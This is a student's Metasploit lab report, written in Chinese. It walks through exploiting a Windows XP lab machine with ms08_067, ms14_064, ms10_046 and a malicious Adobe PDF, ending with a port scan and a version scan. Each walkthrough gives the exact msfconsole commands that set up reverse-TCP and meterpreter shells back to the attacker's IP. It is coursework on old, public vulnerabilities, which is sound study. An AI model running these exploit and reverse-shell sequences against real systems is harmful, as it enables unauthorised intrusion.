2019-2020-2 20175216 《网络对抗技术》Exp6 MSF基础应用

2019-2020-2 20175216 《网络对抗技术》Exp6 MSF基础应用

实践内容

一个主动攻击实践

ms08_067

  • Windows Xp的IP:192.168.170.155 kali的IP:192.168.170.142, XPping一下kali
    1.ping通.PNG

  • 启动msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi,如下图所示:

查找漏洞.PNG

  • 输入指令 use exploit/windows/smb/ms08_067_netapi 进入攻击模块,使用 show payloads,查看能够使用的payloads

show.PNG

  • 使用指令 set payload generic/shell_reverse_tcp 设置payload为反向tcp连接,使用 show options 查看可以设置的参数

设置有效载荷.PNG

  • 设置参数
set RHOST 192.168.170.155 //设置靶机IP
set LPORT 5216  //设置攻击机端口
set LHOST 192.168.170.142//设置攻击机IP
exploit

exploit.PNG

  • 回连成功之后输入ipconfig查看信息

查看IP地址.PNG
ip1.PNG

  • 输入net user查看Win目前的用户名

用户.PNG

一个针对浏览器的攻击

ms14_064

  • 启动msfconsole,然后输入search ms14_064 查找该漏洞使用的攻击模块,攻击模块为windows/browser/ms14_064_ole_code_execution,如下图所示:

4.0.PNG

  • 使用use windows/browser/ms14_064_ole_code_execution设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

4.7.PNG

  • 设置参数
set LHOST 192.168.170.142
set LPORT 5216
set URIPATH 5216zxy//设置url域名
exploit

4.8.PNG

  • 在Windows Xp浏览器输入http://192.168.170.142:8080/5216zxy

4.3.PNG
4.4.PNG

  • 用指令sessions 查看会话信息

4.5.PNG

  • 通过输入sessions -i 1获取第一个会话连接,并输入ipconfig验证是否为靶机地址,使用dir查看文件目录

4.6.PNG

ms10_046

  • 启动msfconsole,然后输入searchms10_046 查找该漏洞使用的攻击模块,攻击模块为exploit/windows/browser/ms10_046_shortcut_icon_dllloader,如下图所示:

777.PNG

  • 使用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

888.PNG

  • 设置参数
set SRVHOST 192.168.170.142
set LHOST 192.168.170.142
exploit

666.PNG

  • 在windows XP的浏览器中访问刚刚设置的服务器IPhttp://192.168.170.142弹出如下窗口

555.PNG

  • 同时攻击者会开始监听并与靶机建立连接。

222.PNG

  • 输入sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。

  • 输入sessions -i 1控制靶机(-i后面的数即为靶机对应的序号),并输入ipconfig查看主机IP地址

333.PNG

444.PNG

一个针对客户端的攻击

Adobe

  • 启动msfconsole,然后输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton,如下图所示:

3.search adobe.PNG

  • 使用use exploit/windows/fileformat/adobe_toolbutton设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数

3.设置载荷.PNG

  • 设置参数
set RHOST 192.168.170.155//设置靶机IP
set LPORT 5216  //设置攻击机端口
set LHOST 192.168.170.142 //设置攻击机IP
exploit

3.创建adobe.PNG

  • 在linux中另外打开一个终端,msfconsole进入控制台
  • 输入use exploit/multi/handler使用监听模块,设置payload
  • 使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.170.142
  • 端口号也相同:set LPORT 5216
  • 设置完成后,exploit开始监听

3.反向链接.PNG

  • 靶机中打开msf.pdf文件,靶机上钩,攻击成功
  • kali中发现回连成功

3.adobe链接成功.PNG

  • 输入ipconfig

3.success.PNG

成功应用任何一个辅助模块

cert辅助模块(唯一)

  • cert的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期
  • 输入search cert首先查看辅助模块cert辅助模块的信息

10.5.PNG

  • 设置参数
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.170.142/24
set THREADS 50
run

10.1.PNG

10.2.PNG

TCP"XMas"端口扫描(唯一)

  • 该模块的主要作用是判断端口是开放还是关闭,结果表示端口是开放或者被过滤(屏蔽)的.
  • 输入search xmas首先查看xmas辅助模块的信息
    8.2.PNG
  • 设置参数
use auxiliary/scanner/portscan/xmas
set RHOST 192.168.170.142
set ports 5216
run

8.1.PNG

实验总结

实验问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit就是通过漏洞将自己的恶意代码植入目标主机从而达到攻击的目的
  • payload是载荷,里面包含了攻击者想要执行的代码
  • encode可以对恶意代码进行伪装,使其不被目标主机发现,从而达到攻击的目的。

离实战还缺些什么技术或步骤?
现在做的实验大多都是针对已经淘汰掉的系统进行的攻击,这些系统的版本已经很久没有更新过了,对他们进行攻击会相对容易一些,还有就是咱们既然可以学习这些攻击技术,那些做软件做系统的也能学到,他们已经对自己的软件和系统做了很多的测试,要想真正的去攻击真的挺难的。

实践体会

在做实验的过程中,这次实验让我系统地了解了它的六大模块,msf的功能有点强啊,不过要学的知识还有很多,路漫漫其修远兮,吾将上下而求索。做实验过程中最难过的时候,就在你做了那么多操作,就差最后一步的时候,它却没有攻击成功。
从我们做过的实验来看,有很大一部分攻击都是源于被攻击者的安全意识不够,如果安全意识得到提高,被攻击的概率就会下降。

posted @ 2020-04-27 18:06  20175216张雪原  阅读(297)  评论(0编辑  收藏  举报